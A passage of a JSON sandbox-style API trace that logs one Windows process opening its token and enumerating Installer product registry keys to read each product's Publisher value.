"name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\6F44AD6D2BD8E734883088D7D16A3610\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 881 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 882 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 883 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00J\"A\\x00\\x1c4\\x1cw" } ], "repeated": 0, "id": 884 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 885 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 886 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "Index", "value": "3" }, { "name": "Name", "value": "7A843FC81A86453429FD1FC7B2B3EF24" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\7A843FC81A86453429FD1FC7B2B3EF24" } ], "repeated": 0, "id": 887 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000384" } ], "repeated": 0, "id": 888 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x9a\\x85\\x02" } ], "repeated": 0, "id": 889 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000384" } ], "repeated": 0, "id": 890 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 891 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 892 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 893 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00\\x00\\x00G\\x02\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 894 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 895 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\7A843FC81A86453429FD1FC7B2B3EF24" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\7A843FC81A86453429FD1FC7B2B3EF24" } ], "repeated": 0, "id": 896 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 897 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00\\xa4\\x9e\\x18\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 898 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 899 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\7A843FC81A86453429FD1FC7B2B3EF24" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\7A843FC81A86453429FD1FC7B2B3EF24" } ], "repeated": 0, "id": 900 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 901 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 902 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "L\\x9b\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xac\\x9b\\x18\\x00\\x00\\x00\\x00\\x00\\xb3\\x9b\\x18\\x00\"\r\\xc6r\\xd0\\x9b\\x18\\x00\\xc4\\x9b\\x18\\x00H\\x00\\x00\\x00\\xf4\\x9b\\x18\\x00\\xbc\\x9e\\x18\\x00" } ], "repeated": 0, "id": 903 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 904 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\7A843FC81A86453429FD1FC7B2B3EF24\\InstallProperties" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\7A843FC81A86453429FD1FC7B2B3EF24\\InstallProperties" } ], "repeated": 0, "id": 905 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x000000ea", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Type", "value": "0x00000001", "pretty_value": "REG_SZ" }, { "name": "DataLength", "value": "27" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\7A843FC81A86453429FD1FC7B2B3EF24\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 906 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 907 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 908 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00J\"A\\x00\\x1c4\\x1cw" } ], "repeated": 0, "id": 909 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 910 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 911 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "Index", "value": "4" }, { "name": "Name", "value": "C2852A6403C47FF4FA550FF1E6CF2D6B" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\C2852A6403C47FF4FA550FF1E6CF2D6B" } ], "repeated": 0, "id": 912 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000384" } ], "repeated": 0, "id": 913 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x9a\\x85\\x02" } ], "repeated": 0, "id": 914 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000384" } ], "repeated": 0, "id": 915 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 916 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 917 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 918 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00\\x0cq\\x19w\\x00\\x10\\x00\\x00" } ], "repeated": 0, "id": 919 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 920 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\C2852A6403C47FF4FA550FF1E6CF2D6B" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\C2852A6403C47FF4FA550FF1E6CF2D6B" } ], "repeated": 0, "id": 921 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 922 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00\\xa4\\x9e\\x18\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 923 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 924 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\C2852A6403C47FF4FA550FF1E6CF2D6B" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\C2852A6403C47FF4FA550FF1E6CF2D6B" } ], "repeated": 0, "id": 925 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 926 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 927 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "L\\x9b\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xac\\x9b\\x18\\x00\\x00\\x00\\x00\\x00\\xb3\\x9b\\x18\\x00\"\r\\xc6r\\xd0\\x9b\\x18\\x00\\xc4\\x9b\\x18\\x00H\\x00\\x00\\x00\\xf4\\x9b\\x18\\x00\\xbc\\x9e\\x18\\x00" } ], "repeated": 0, "id": 928 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 929 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\C2852A6403C47FF4FA550FF1E6CF2D6B\\InstallProperties" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\C2852A6403C47FF4FA550FF1E6CF2D6B\\InstallProperties" } ], "repeated": 0, "id": 930 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x000000ea", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Type", "value": "0x00000001", "pretty_value": "REG_SZ" }, { "name": "DataLength", "value": "27" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\C2852A6403C47FF4FA550FF1E6CF2D6B\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 931 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 932 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 933 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00J\"A\\x00\\x1c4\\x1cw" } ], "repeated": 0, "id": 934 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": 